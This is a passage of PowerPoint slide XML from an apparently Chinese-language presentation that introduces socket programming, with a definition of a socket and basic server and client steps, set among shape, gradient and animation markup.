              <a:gd name="T3" fmla="*/ 386 h 773"/>
              <a:gd name="T4" fmla="*/ 753 w 772"/>
              <a:gd name="T5" fmla="*/ 538 h 773"/>
              <a:gd name="T6" fmla="*/ 633 w 772"/>
              <a:gd name="T7" fmla="*/ 633 h 773"/>
              <a:gd name="T8" fmla="*/ 538 w 772"/>
              <a:gd name="T9" fmla="*/ 753 h 773"/>
              <a:gd name="T10" fmla="*/ 386 w 772"/>
              <a:gd name="T11" fmla="*/ 735 h 773"/>
              <a:gd name="T12" fmla="*/ 324 w 772"/>
              <a:gd name="T13" fmla="*/ 747 h 773"/>
              <a:gd name="T14" fmla="*/ 234 w 772"/>
              <a:gd name="T15" fmla="*/ 753 h 773"/>
              <a:gd name="T16" fmla="*/ 139 w 772"/>
              <a:gd name="T17" fmla="*/ 633 h 773"/>
              <a:gd name="T18" fmla="*/ 19 w 772"/>
              <a:gd name="T19" fmla="*/ 538 h 773"/>
              <a:gd name="T20" fmla="*/ 37 w 772"/>
              <a:gd name="T21" fmla="*/ 386 h 773"/>
              <a:gd name="T22" fmla="*/ 19 w 772"/>
              <a:gd name="T23" fmla="*/ 235 h 773"/>
              <a:gd name="T24" fmla="*/ 139 w 772"/>
              <a:gd name="T25" fmla="*/ 140 h 773"/>
              <a:gd name="T26" fmla="*/ 234 w 772"/>
              <a:gd name="T27" fmla="*/ 20 h 773"/>
              <a:gd name="T28" fmla="*/ 386 w 772"/>
              <a:gd name="T29" fmla="*/ 38 h 773"/>
              <a:gd name="T30" fmla="*/ 447 w 772"/>
              <a:gd name="T31" fmla="*/ 26 h 773"/>
              <a:gd name="T32" fmla="*/ 538 w 772"/>
              <a:gd name="T33" fmla="*/ 20 h 773"/>
              <a:gd name="T34" fmla="*/ 633 w 772"/>
              <a:gd name="T35" fmla="*/ 140 h 773"/>
              <a:gd name="T36" fmla="*/ 753 w 772"/>
              <a:gd name="T37" fmla="*/ 235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2" h="773">
                <a:moveTo>
                  <a:pt x="753" y="235"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="772" y="281"/>
                  <a:pt x="735" y="339"/>
                  <a:pt x="735" y="386"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="735" y="436"/>
                  <a:pt x="771" y="493"/>
                  <a:pt x="753" y="538"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="734" y="583"/>
                  <a:pt x="667" y="598"/>
                  <a:pt x="633" y="633"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="599" y="667"/>
                  <a:pt x="585" y="734"/>
                  <a:pt x="538" y="753"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="491" y="773"/>
                  <a:pt x="434" y="735"/>
                  <a:pt x="386" y="735"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="366" y="735"/>
                  <a:pt x="345" y="741"/>
                  <a:pt x="324" y="747"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="756"/>
                  <a:pt x="261" y="764"/>
                  <a:pt x="234" y="753"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="189" y="735"/>
                  <a:pt x="174" y="668"/>
                  <a:pt x="139" y="633"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="600"/>
                  <a:pt x="39" y="585"/>
                  <a:pt x="19" y="538"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="492"/>
                  <a:pt x="37" y="434"/>
                  <a:pt x="37" y="386"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="337"/>
                  <a:pt x="1" y="279"/>
                  <a:pt x="19" y="235"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38" y="190"/>
                  <a:pt x="104" y="175"/>
                  <a:pt x="139" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="173" y="106"/>
                  <a:pt x="187" y="39"/>
                  <a:pt x="234" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="281" y="0"/>
                  <a:pt x="338" y="38"/>
                  <a:pt x="386" y="38"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="406" y="38"/>
                  <a:pt x="427" y="32"/>
                  <a:pt x="447" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="479" y="17"/>
                  <a:pt x="511" y="9"/>
                  <a:pt x="538" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="583" y="38"/>
                  <a:pt x="598" y="105"/>
                  <a:pt x="633" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="666" y="173"/>
                  <a:pt x="733" y="188"/>
                  <a:pt x="753" y="235"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:alpha val="90000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                  <a:alpha val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="80000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3592956" y="2959978"/>
            <a:ext cx="1513840" cy="579120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Part </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="直接连接符 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4778443" y="3499305"/>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9"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out)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>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10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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="35" presetClass="path" presetSubtype="0" decel="40000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.02761 -1.48148E-6 L 0.20768 -1.48148E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="11758" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="16" presetID="35" presetClass="path" presetSubtype="0" accel="40000" decel="40000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.028 -1.48148E-6 L 2.91667E-6 -1.48148E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="1393" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetID="31" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="90"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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3" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="1" animBg="1"/>
      <p:bldP spid="14" grpId="2" animBg="1"/>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3137133" y="429460"/>
            <a:ext cx="417211" cy="1495661"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1"/>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
              </a:path>
              <a:tileRect/>
            </a:gradFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="127000" dist="63500" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="27000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="椭圆 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1397996" y="546496"/>
            <a:ext cx="1259763" cy="1259763"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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kumimoji="1" lang="en-US" altLang="zh-CN" sz="6600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="组合 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3635375" y="581660"/>
            <a:ext cx="7048500" cy="1224942"/>
            <a:chOff x="6843957" y="4188086"/>
            <a:chExt cx="6232656" cy="982153"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="矩形 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6843957" y="4525668"/>
              <a:ext cx="6232656" cy="644571"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>网络上的两个程序通过一个双向的通信连接实现数据的交换，这个连接的一端称为一个socket。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="矩形 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6843957" y="4188086"/>
              <a:ext cx="975326" cy="293265"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>socket</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="组合 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3554095" y="3832860"/>
            <a:ext cx="3257550" cy="2309153"/>
            <a:chOff x="6843957" y="4188086"/>
            <a:chExt cx="6232656" cy="1785707"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="矩形 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6843957" y="4525668"/>
              <a:ext cx="6232656" cy="1448125"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1、创建socket</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2、bind端口</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>3、等待连接</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>4、开始通讯</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>5、关闭连接</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="矩形 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7039779" y="4188086"/>
              <a:ext cx="2202937" cy="282848"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Server:</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7209790" y="3922395"/>
            <a:ext cx="3625850" cy="1863090"/>
            <a:chOff x="6799988" y="4188086"/>
            <a:chExt cx="6276625" cy="1100502"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6799988" y="4392883"/>
              <a:ext cx="6276625" cy="895705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1、创建socket</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2、连接目标</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>3、开始通讯</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>4、关闭连接</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7039779" y="4188086"/>
              <a:ext cx="2202937" cy="216049"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Client</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>：</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3777615" y="2216150"/>
            <a:ext cx="6732905" cy="1150221"/>
            <a:chOff x="6843957" y="4188086"/>
            <a:chExt cx="6232656" cy="1121230"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="矩形 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6843957" y="4525668"/>
              <a:ext cx="6232656" cy="783648"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="130000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
